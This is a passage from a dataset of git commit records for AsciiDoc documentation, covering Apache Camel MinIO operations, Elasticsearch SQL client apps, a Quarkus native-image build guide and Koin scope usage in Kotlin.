exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n exchange.getIn().setHeader(MinioConstants.DESTINATION_OBJECT_NAME, \"camelDestinationKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=copyObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will copy the object with the name expressed in the header camelDestinationKey to the camelDestinationBucket bucket, from the bucket mycamelbucket.\n\n- DeleteObject: this operation deletes an object from a bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=deleteObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the object camelKey from the bucket mycamelbucket.\n\n- ListBuckets: this operation list the buckets for this account in this region\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=listBuckets\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the buckets for this account\n\n- DeleteBucket: this operation delete the bucket specified as URI parameter or header\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=deleteBucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the bucket mycamelbucket\n\n- ListObjects: this operation list object in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=listObjects\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the objects in the mycamelbucket bucket\n\n- GetObject: this operation get a single object in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=getObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an MinioObject instance related to the camelKey object in mycamelbucket bucket.\n\n- GetObjectRange: this operation get a single object range in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n exchange.getIn().setHeader(MinioConstants.OFFSET, \"0\");\n exchange.getIn().setHeader(MinioConstants.LENGTH, \"9\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=getObjectRange\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an MinioObject instance related to the camelKey object in mycamelbucket bucket, containing bytes from 0 to 9.\n\n== Bucket Autocreation\n\nWith the option `autoCreateBucket` users are able to avoid the autocreation of a Minio Bucket in case it doesn't exist. The default for this option is `true`.\nIf set to false any operation on a not-existent bucket in Minio won't be successful, and an error will be returned.\n\n== Automatic detection of Minio client in registry\n\nThe component is capable of detecting the presence of a Minio bean into the registry.\nIf it's the only instance of that type it will be used as client, and you won't have to define it as uri parameter, like the example above.\nThis may be really useful for smarter configuration of the endpoint.\n\n== Moving stuff between a bucket and another bucket\n\nSome users like to consume stuff from a bucket and move the content in a different one without using the copyObject feature of this component.\nIf this is case for you, don't forget to remove the bucketName header from the incoming exchange of the consumer, otherwise the file will always be overwritten on the same\noriginal bucket.\n\n== MoveAfterRead consumer option\n\nIn addition to deleteAfterRead it has been added another option, moveAfterRead. With this option enabled the consumed object will be moved to a target destinationBucket instead of being only deleted.\nThis will require specifying the destinationBucket option. As example:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"minio:\/\/mycamelbucket?minioClient=#minioClient&moveAfterRead=true&destinationBucketName=myothercamelbucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to myothercamelbucket bucket and deleted from the original one (because of deleteAfterRead set to true as default).\n\n== Using a POJO as body\n\nSometimes build a Minio Request can be complex, because of multiple options. We introduce the possibility to use a POJO as body.\nIn Minio there are multiple operations you can submit, as an example for List brokers request, you can do something like:\n\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:minio\")\n .setBody(ListObjectsArgs.builder()\n .bucket(bucketName)\n .recursive(getConfiguration().isRecursive())))\n .to(\"minio:\/\/test?minioClient=#minioClient&operation=listObjects&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly without the need of passing headers and options specifically related to this operation.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-minio<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version}` must be replaced by the actual version of Camel.\n\ninclude::camel-spring-boot::page$minio-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32a22ca00e5329b785e4aa248677aab7d3349191","subject":"DOC: improved wording in SQL client app section","message":"DOC: improved wording in SQL client app section\n","repos":"gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/sql\/endpoints\/client-apps\/index.asciidoc","new_file":"docs\/reference\/sql\/endpoints\/client-apps\/index.asciidoc","new_contents":"[role=\"xpack\"]\r\n[testenv=\"platinum\"]\r\n[[sql-client-apps]]\r\n== SQL Client Applications\r\n\r\nThanks to its <<sql-jdbc, JDBC>> interface, a broad range of third-party applications can use {es}'s SQL capabilities.\r\nThis section lists, in alphabetical order, a number of them and their respective configuration - the list however is by no means comprehensive (feel free to https:\/\/www.elastic.co\/blog\/art-of-pull-request[submit a PR] to improve it):\r\nas long as the app can use the {es-sql} driver, it can use {es-sql}.\r\n\r\n* <<sql-client-apps-dbeaver, DBeaver>>\r\n* <<sql-client-apps-dbvis, DbVisualizer>>\r\n* <<sql-client-apps-squirrel, SQuirreL SQL>>\r\n* <<sql-client-apps-workbench, SQL Workbench>>\r\n\r\nNOTE: Each application has its own requirements and license; these are outside the scope of this documentation\r\nwhich covers only the configuration aspect with {es-sql}.\r\n\r\ninclude::dbeaver.asciidoc[]\r\ninclude::dbvis.asciidoc[]\r\ninclude::squirrel.asciidoc[]\r\ninclude::workbench.asciidoc[]\r\n","old_contents":"[role=\"xpack\"]\r\n[testenv=\"platinum\"]\r\n[[sql-client-apps]]\r\n== SQL Client Applications\r\n\r\nThanks to its <<sql-jdbc, JDBC>> interface, {es-sql} supports a broad range of applications.\r\nThis section lists, in alphabetical order, a number of them and their respective configuration - the list however is by no means comprehensive (feel free to https:\/\/www.elastic.co\/blog\/art-of-pull-request[submit a PR] to improve it):\r\nas long as the app can use the {es-sql} driver, it can use {es-sql}.\r\n\r\n* <<sql-client-apps-dbeaver, DBeaver>>\r\n* <<sql-client-apps-dbvis, DbVisualizer>>\r\n* <<sql-client-apps-squirrel, SQuirreL SQL>>\r\n* <<sql-client-apps-workbench, SQL Workbench>>\r\n\r\nNOTE: Each application has its own requirements and license; these are outside the scope of this documentation\r\nwhich covers only the configuration aspect with {es-sql}.\r\n\r\ninclude::dbeaver.asciidoc[]\r\ninclude::dbvis.asciidoc[]\r\ninclude::squirrel.asciidoc[]\r\ninclude::workbench.asciidoc[]\r\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"713263cf48f8cf3e49d8f8f699679541c0b8a262","subject":"Let's put Linux first","message":"Let's put Linux first\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/building-native-image-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/building-native-image-guide.adoc","new_contents":"= {project-name} - Building a Native Image\n\nThis guide covers:\n\n* Compiling the application to a native executable\n* The packaging of the application in a Docker container\n\nThis guide takes as input the application developed in the link:getting-started-guide.html[Getting Started Guide].\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* GraalVM installed from the http:\/\/www.graalvm.org\/downloads\/[GraalVM web site].\nUsing the community edition is enough.\nAt least version {graal-version} is required.\n* The `GRAALVM_HOME` environment variable configured appropriately\n* Apache Maven 3.5.3+\n* A running Docker\n* The code of the application developed in the link:getting-started-guide.adoc[Getting Started Guide].\n\n[NOTE]\n====\nOnce you have downloaded GraalVM, expand the archive and set the `GRAALVM_HOME` variable to this location:\n\n`export GRAALVM_HOME=~clement\/Development\/graalvm\/`\n\nOn MacOS, point the variable to the `Home` sub-directory:\n\n`export GRAALVM_HOME=~clement\/Development\/graalvm\/Contents\/Home\/`\n====\n\nRemember, you need to configure Maven as indicated in the link:maven-config.html[Maven configuration page].\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and package the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `getting-started-native` directory.\n\n== Producing a native executable\n\nLet's now produce a native executable for our application.\nIt improves the startup time of the application, and produces a minimal disk footprint.\nThe executable would have everything to run the application including the \"JVM\" (shrunk to be just enough to run the application), and the application.\n\nimage:native-image-process.png[Creating a native executable, width=640]\n\nBefore going further, be sure that the `GRAALVM_HOME` environment variable is configured appropriately.\n\nIf you have generated the application from the previous tutorial, you can find in the `pom.xml` the following _profile_:\n\n[source,xml]\n----\n<profiles>\n <profile>\n <id>native<\/id>\n <build>\n <plugins>\n <plugin>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-maven-plugin<\/artifactId>\n <version>${quarkus.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>native-image<\/goal>\n <\/goals>\n <configuration>\n <enableHttpUrlHandler>true<\/enableHttpUrlHandler>\n <\/configuration>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n <\/build>\n <\/profile>\n<\/profiles>\n----\n\nWe use a profile because, you will see very soon, packaging the native image takes a _few_ seconds.\n\nCreate a native executable using: `mvn package -Pnative`.\n\nIn addition to the regular files, the build also produces `target\/quarkus-quickstart-runner`.\nYou can run it using: `.\/target\/quarkus-quickstart-runner`.\n\n== Testing the native executable\n\nProducing a native executable can lead to a few issues, and so it's also a good idea to run some tests against the application running in the native file.\n\nIn the `pom.xml` file, extend the `native` profile with:\n\n[source, xml]\n----\n<plugin>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-failsafe-plugin<\/artifactId>\n <version>${surefire.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>integration-test<\/goal>\n <goal>verify<\/goal>\n <\/goals>\n <configuration>\n <systemProperties>\n <native.image.path>${project.build.directory}\/${project.build.finalName}-runner<\/native.image.path>\n <\/systemProperties>\n <\/configuration>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nThen, create the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceIT.java` with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\n\nimport io.quarkus.test.junit.SubstrateTest;\n\n@SubstrateTest \/\/ <1>\npublic class GreetingResourceIT extends GreetingResourceTest { \/\/ <2>\n\n \/\/ Run the same tests\n\n}\n----\n<1> Use another test runner that starts the application from the native file before the tests.\nThe executable is retrieved using the `native.image.path` system property configured in the _Failsafe Maven Plugin_.\n<2> We extend our previous tests, but you can also implement your tests\n\nTo see the `GreetingResourceIT` run against the native image, add a verify goal:\n[source]\n----\nmvn package verify -Pnative\n...\n[quarkus-quickstart-runner:50955] universe: 391.96 ms\n[quarkus-quickstart-runner:50955] (parse): 904.37 ms\n[quarkus-quickstart-runner:50955] (inline): 1,143.32 ms\n[quarkus-quickstart-runner:50955] (compile): 6,228.44 ms\n[quarkus-quickstart-runner:50955] compile: 9,130.58 ms\n[quarkus-quickstart-runner:50955] image: 2,101.42 ms\n[quarkus-quickstart-runner:50955] write: 803.18 ms\n[quarkus-quickstart-runner:50955] [total]: 33,520.15 ms\n[INFO]\n[INFO] --- maven-failsafe-plugin:2.22.0:integration-test (default) @ quarkus-quickstart-native ---\n[INFO]\n[INFO] -------------------------------------------------------\n[INFO] T E S T S\n[INFO] -------------------------------------------------------\n[INFO] Running org.acme.quickstart.GreetingResourceIT\nExecuting [\/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started-native\/target\/quarkus-quickstart-runner, -Dquarkus.http.port=8081, -Dtest.url=http:\/\/localhost:8081, -Dquarkus.log.file.path=target\/quarkus.log]\n2019-02-28 16:52:42,020 INFO [io.quarkus] (main) Quarkus 1.0.0.Alpha1-SNAPSHOT started in 0.007s. Listening on: http:\/\/localhost:8080\n2019-02-28 16:52:42,021 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n[INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.081 s - in org.acme.quickstart.GreetingResourceIT\n[INFO]\n[INFO] Results:\n[INFO]\n[INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0\n\n...\n----\n\n== Producing a Docker container\n\nIMPORTANT: Before going further, be sure to have a working Docker environment.\n\nYou can run the application in a Docker container using the JAR produced by the Quarkus Maven Plugin.\nHowever, in this guide we focus on creating a Docker image using the produced native executable.\n\nBy default, the native image is tailored for your operating system (Linux, macOS, Windows etc).\nBecause the Docker container may not use the same _executable_ format as the one produced by your operating system,\nwe will instruct the Maven build to produce an executable from inside a Docker container:\n\n[source, bash]\n----\nmvn package -Pnative -Dnative-image.docker-build=true\n----\n\nThe produced executable will be a 64 bit Linux executable, so depending on your operating system it may no longer be runnable.\nHowever, it's not an issue as we are going to copy it to a Docker container.\nThe project generation has provided a `Dockerfile` in the `src\/main\/docker` directory with the following content:\n\n[source]\n----\nFROM registry.fedoraproject.org\/fedora-minimal\nWORKDIR \/work\/\nCOPY target\/*-runner \/work\/application\nRUN chmod 775 \/work\nEXPOSE 8080\nCMD [\".\/application\", \"-Dquarkus.http.host=0.0.0.0\"]\n----\n\nThen, if you didn't delete the generated native executable, you can build the docker image with:\n\n[source]\n----\ndocker build -f src\/main\/docker\/Dockerfile -t quarkus-quickstart\/quickstart .\n----\n\nAnd finally, run it with:\n\n[source]\n----\ndocker run -i --rm -p 8080:8080 quarkus-quickstart\/quickstart\n----\n\nNOTE: Interested by tiny Docker images, check the {quarkus-tree-url}\/docker\/distroless[distroless] version.\n\n== What's next?\n\nThis guide covered the creation of a native (binary) executable for your application.\nIt provides an application exhibiting a swift startup time and consuming less memory.\nHowever, there is much more.\nWe recommend continuing the journey with the link:kubernetes-guide.html[deployment to Kubernetes and OpenShift].\n","old_contents":"= {project-name} - Building a Native Image\n\nThis guide covers:\n\n* Compiling the application to a native executable\n* The packaging of the application in a Docker container\n\nThis guide takes as input the application developed in the link:getting-started-guide.html[Getting Started Guide].\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* GraalVM installed from the http:\/\/www.graalvm.org\/downloads\/[GraalVM web site].\nUsing the community edition is enough.\nAt least version {graal-version} is required.\n* The `GRAALVM_HOME` environment variable configured appropriately\n* Apache Maven 3.5.3+\n* A running Docker\n* The code of the application developed in the link:getting-started-guide.adoc[Getting Started Guide].\n\n[NOTE]\n====\nOnce you have downloaded GraalVM, expand the archive and set the `GRAALVM_HOME` variable to this location:\n\n`export GRAALVM_HOME=~clement\/Development\/graalvm\/`\n\nOn MacOS, point the variable to the `Home` sub-directory:\n\n`export GRAALVM_HOME=~clement\/Development\/graalvm\/Contents\/Home\/`\n====\n\nRemember, you need to configure Maven as indicated in the link:maven-config.html[Maven configuration page].\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and package the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `getting-started-native` directory.\n\n== Producing a native executable\n\nLet's now produce a native executable for our application.\nIt improves the startup time of the application, and produces a minimal disk footprint.\nThe executable would have everything to run the application including the \"JVM\" (shrunk to be just enough to run the application), and the application.\n\nimage:native-image-process.png[Creating a native executable, width=640]\n\nBefore going further, be sure that the `GRAALVM_HOME` environment variable is configured appropriately.\n\nIf you have generated the application from the previous tutorial, you can find in the `pom.xml` the following _profile_:\n\n[source,xml]\n----\n<profiles>\n <profile>\n <id>native<\/id>\n <build>\n <plugins>\n <plugin>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-maven-plugin<\/artifactId>\n <version>${quarkus.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>native-image<\/goal>\n <\/goals>\n <configuration>\n <enableHttpUrlHandler>true<\/enableHttpUrlHandler>\n <\/configuration>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n <\/build>\n <\/profile>\n<\/profiles>\n----\n\nWe use a profile because, you will see very soon, packaging the native image takes a _few_ seconds.\n\nCreate a native executable using: `mvn package -Pnative`.\n\nIn addition to the regular files, the build also produces `target\/quarkus-quickstart-runner`.\nYou can run it using: `.\/target\/quarkus-quickstart-runner`.\n\n== Testing the native executable\n\nProducing a native executable can lead to a few issues, and so it's also a good idea to run some tests against the application running in the native file.\n\nIn the `pom.xml` file, extend the `native` profile with:\n\n[source, xml]\n----\n<plugin>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-failsafe-plugin<\/artifactId>\n <version>${surefire.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>integration-test<\/goal>\n <goal>verify<\/goal>\n <\/goals>\n <configuration>\n <systemProperties>\n <native.image.path>${project.build.directory}\/${project.build.finalName}-runner<\/native.image.path>\n <\/systemProperties>\n <\/configuration>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nThen, create the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceIT.java` with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\n\nimport io.quarkus.test.junit.SubstrateTest;\n\n@SubstrateTest \/\/ <1>\npublic class GreetingResourceIT extends GreetingResourceTest { \/\/ <2>\n\n \/\/ Run the same tests\n\n}\n----\n<1> Use another test runner that starts the application from the native file before the tests.\nThe executable is retrieved using the `native.image.path` system property configured in the _Failsafe Maven Plugin_.\n<2> We extend our previous tests, but you can also implement your tests\n\nTo see the `GreetingResourceIT` run against the native image, add a verify goal:\n[source]\n----\nmvn package verify -Pnative\n...\n[quarkus-quickstart-runner:50955] universe: 391.96 ms\n[quarkus-quickstart-runner:50955] (parse): 904.37 ms\n[quarkus-quickstart-runner:50955] (inline): 1,143.32 ms\n[quarkus-quickstart-runner:50955] (compile): 6,228.44 ms\n[quarkus-quickstart-runner:50955] compile: 9,130.58 ms\n[quarkus-quickstart-runner:50955] image: 2,101.42 ms\n[quarkus-quickstart-runner:50955] write: 803.18 ms\n[quarkus-quickstart-runner:50955] [total]: 33,520.15 ms\n[INFO]\n[INFO] --- maven-failsafe-plugin:2.22.0:integration-test (default) @ quarkus-quickstart-native ---\n[INFO]\n[INFO] -------------------------------------------------------\n[INFO] T E S T S\n[INFO] -------------------------------------------------------\n[INFO] Running org.acme.quickstart.GreetingResourceIT\nExecuting [\/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started-native\/target\/quarkus-quickstart-runner, -Dquarkus.http.port=8081, -Dtest.url=http:\/\/localhost:8081, -Dquarkus.log.file.path=target\/quarkus.log]\n2019-02-28 16:52:42,020 INFO [io.quarkus] (main) Quarkus 1.0.0.Alpha1-SNAPSHOT started in 0.007s. Listening on: http:\/\/localhost:8080\n2019-02-28 16:52:42,021 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n[INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.081 s - in org.acme.quickstart.GreetingResourceIT\n[INFO]\n[INFO] Results:\n[INFO]\n[INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0\n\n...\n----\n\n== Producing a Docker container\n\nIMPORTANT: Before going further, be sure to have a working Docker environment.\n\nYou can run the application in a Docker container using the JAR produced by the Quarkus Maven Plugin.\nHowever, in this guide we focus on creating a Docker image using the produced native executable.\n\nBy default, the native image is tailored for your operating system (Windows, macOS etc).\nBecause the Docker container may not use the same _executable_ format as the one produced by your operating system,\nwe will instruct the Maven build to produce an executable from inside a Docker container:\n\n[source, bash]\n----\nmvn package -Pnative -Dnative-image.docker-build=true\n----\n\nThe produced executable will be a 64 bit Linux executable, so depending on your operating system it may no longer be runnable.\nHowever, it's not an issue as we are going to copy it to a Docker container.\nThe project generation has provided a `Dockerfile` in the `src\/main\/docker` directory with the following content:\n\n[source]\n----\nFROM registry.fedoraproject.org\/fedora-minimal\nWORKDIR \/work\/\nCOPY target\/*-runner \/work\/application\nRUN chmod 775 \/work\nEXPOSE 8080\nCMD [\".\/application\", \"-Dquarkus.http.host=0.0.0.0\"]\n----\n\nThen, if you didn't delete the generated native executable, you can build the docker image with:\n\n[source]\n----\ndocker build -f src\/main\/docker\/Dockerfile -t quarkus-quickstart\/quickstart .\n----\n\nAnd finally, run it with:\n\n[source]\n----\ndocker run -i --rm -p 8080:8080 quarkus-quickstart\/quickstart\n----\n\nNOTE: Interested by tiny Docker images, check the {quarkus-tree-url}\/docker\/distroless[distroless] version.\n\n== What's next?\n\nThis guide covered the creation of a native (binary) executable for your application.\nIt provides an application exhibiting a swift startup time and consuming less memory.\nHowever, there is much more.\nWe recommend continuing the journey with the link:kubernetes-guide.html[deployment to Kubernetes and OpenShift].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5424e7f6cd818c6b5a5b9215c0c0502863547380","subject":"Fix missing parameter in example code","message":"Fix missing parameter in example code\n","repos":"Ekito\/koin,Ekito\/koin,InsertKoinIO\/koin,InsertKoinIO\/koin,InsertKoinIO\/koin","old_file":"koin-projects\/koin-core\/src\/docs\/asciidoc\/scope-api.adoc","new_file":"koin-projects\/koin-core\/src\/docs\/asciidoc\/scope-api.adoc","new_contents":"== Using Scopes\n\nKoin brings a simple API to let you define instances that are tied to a limit lifetime.\n\n=== What is a scope?\n\nScope is a fixed duration of time or method calls in which an object exists.\nAnother way to look at this is to think of scope as the amount of time an object\u2019s state persists.\nWhen the scope context ends, any objects bound under that scope cannot be injected again (they are dropped from the container).\n\n=== Scope definition\n\nBy default in Koin, we have 3 kind of scopes:\n\n- `single` definition, create an object that persistent with the entire container lifetime (can't be dropped).\n- `factory` definition, create a new object each time. Short live. No persistence in the container (can't be shared).\n- `scope` definition, create an object that persistent tied to the associated scope lifetime.\n\nTo declare a scope definition, use the `scope` function with a given scope Id:\n\n[source,kotlin]\n----\nmodule {\n scope(\"scope_id\") { Presenter() }\n}\n----\n\n[IMPORTANT]\n====\nA scope definition can't be resolved if associated scope has not been created. Then `get<Presenter>()` return an error.\n====\n\n=== Create & retrieve a scope\n\nFrom a `KoinComponent` class, just use the `getKoin()` function to have access to following functions\n\n- `createScope(id : String)` - create a scope with given id in the Koin scope registry\n- `getScope(id : String)` - retrieve a previously created scope with given id, from the Koin scope registry\n- `getOrCreateScope(id : String)` - create or retrieve if already created, the scope with given id in the Koin scope registry\n\n=== Using a scope\n\nOnce you have create a `Scope` instance, let use it to resolve a component:\n\n.from a KoinComponent class\n[source,kotlin]\n----\nmodule {\n scope(\"scope_id\") { Presenter() }\n}\n\n\/\/ create a scope\nval session = getKoin().createScope(\"scope_id\")\n\n\/\/ or get scope if already created before\nval session = getKoin().getScope(\"scope_id\")\n\n\/\/ will return the same instance of Presenter until Scope 'scope_id' is closed\nval presenter = get<Presenter>()\n----\n\nJust resolving it: `by inject()` or `get()`. The DSL will indicate which scope to use.\n\n=== Inject it with DSL\n\nIf one of your definition need to inject a scope instance, just resolve it ... but be sure to have created the scope before:\n\n[source,kotlin]\n----\nclass Presenter(val userSession : UserSession)\n----\n\nJust inject it into constructor, with the right scope:\n\n[source,kotlin]\n----\nmodule {\n \/\/ Shared user session data\n scope(\"session\") { UserSession() }\n \/\/ Inject UserSession instance from \"session\" Scope\n factory { Presenter(get())}\n}\n----\n\n=== Closing a scope\n\nOnce your scope is finished, just closed it with the `Scope.close()` function:\n\n[source,kotlin]\n----\n\/\/ from a KoinComponent\nval session = getKoin().createScope(\"session\")\n\/\/ will return the same instance of Presenter until 'session' is closed\nval presenter = get<Presenter>()\n\n\/\/ close it\nsession.close()\n\/\/ instance of presenter has been dropped\n----\n\n[IMPORTANT]\n====\nBeware that you can't inject instances anymore from a closed scope.\n====\n\n=== Scope closing callback\n\nIt's also possible to listen scope closing. Just use the `registerScopeCallback()` function to register a `ScopeCallback` instance.\n\nThis will notify your `ScopeCallback` on the `onClose(id: String)` function, when a scope has been closed.\n\n[source,kotlin]\n----\nregisterScopeCallback(object : ScopeCallback{\n override fun onClose(id: String) {\n \/\/ scope id has been closed\n }\n })\n----\n","old_contents":"== Using Scopes\n\nKoin brings a simple API to let you define instances that are tied to a limit lifetime.\n\n=== What is a scope?\n\nScope is a fixed duration of time or method calls in which an object exists.\nAnother way to look at this is to think of scope as the amount of time an object\u2019s state persists.\nWhen the scope context ends, any objects bound under that scope cannot be injected again (they are dropped from the container).\n\n=== Scope definition\n\nBy default in Koin, we have 3 kind of scopes:\n\n- `single` definition, create an object that persistent with the entire container lifetime (can't be dropped).\n- `factory` definition, create a new object each time. Short live. No persistence in the container (can't be shared).\n- `scope` definition, create an object that persistent tied to the associated scope lifetime.\n\nTo declare a scope definition, use the `scope` function with a given scope Id:\n\n[source,kotlin]\n----\nmodule {\n scope(\"scope_id\") { Presenter() }\n}\n----\n\n[IMPORTANT]\n====\nA scope definition can't be resolved if associated scope has not been created. Then `get<Presenter>()` return an error.\n====\n\n=== Create & retrieve a scope\n\nFrom a `KoinComponent` class, just use the `getKoin()` function to have access to following functions\n\n- `createScope(id : String)` - create a scope with given id in the Koin scope registry\n- `getScope(id : String)` - retrieve a previously created scope with given id, from the Koin scope registry\n- `getOrCreateScope(id : String)` - create or retrieve if already created, the scope with given id in the Koin scope registry\n\n=== Using a scope\n\nOnce you have create a `Scope` instance, let use it to resolve a component:\n\n.from a KoinComponent class\n[source,kotlin]\n----\nmodule {\n scope(\"scope_id\") { Presenter() }\n}\n\n\/\/ create a scope\nval session = getKoin().createScope(\"scope_id\")\n\n\/\/ or get scope if already created before\nval session = getKoin().getScope(\"scope_id\")\n\n\/\/ will return the same instance of Presenter until Scope 'scope_id' is closed\nval presenter = get<Presenter>()\n----\n\nJust resolving it: `by inject()` or `get()`. The DSL will indicate which scope to use.\n\n=== Inject it with DSL\n\nIf one of your definition need to inject a scope instance, just resolve it ... but be sure to have created the scope before:\n\n[source,kotlin]\n----\nclass Presenter(val userSession : UserSession)\n----\n\nJust inject it into constructor, with the right scope:\n\n[source,kotlin]\n----\nmodule {\n \/\/ Shared user session data\n scope { UserSession() }\n \/\/ Inject UserSession instance from \"session\" Scope\n factory { Presenter(get())}\n}\n----\n\n=== Closing a scope\n\nOnce your scope is finished, just closed it with the `Scope.close()` function:\n\n[source,kotlin]\n----\n\/\/ from a KoinComponent\nval session = getKoin().createScope(\"session\")\n\/\/ will return the same instance of Presenter until 'session' is closed\nval presenter = get<Presenter>()\n\n\/\/ close it\nsession.close()\n\/\/ instance of presenter has been dropped\n----\n\n[IMPORTANT]\n====\nBeware that you can't inject instances anymore from a closed scope.\n====\n\n=== Scope closing callback\n\nIt's also possible to listen scope closing. Just use the `registerScopeCallback()` function to register a `ScopeCallback` instance.\n\nThis will notify your `ScopeCallback` on the `onClose(id: String)` function, when a scope has been closed.\n\n[source,kotlin]\n----\nregisterScopeCallback(object : ScopeCallback{\n override fun onClose(id: String) {\n \/\/ scope id has been closed\n }\n })\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9de435a130c2ebfa5d4098b392db6f750cc7b3c4","subject":"ISIS-1521: updates docs for workaround for recreating archetype on Windows and Maven 3.3.3","message":"ISIS-1521: updates docs for workaround for recreating archetype on Windows and Maven 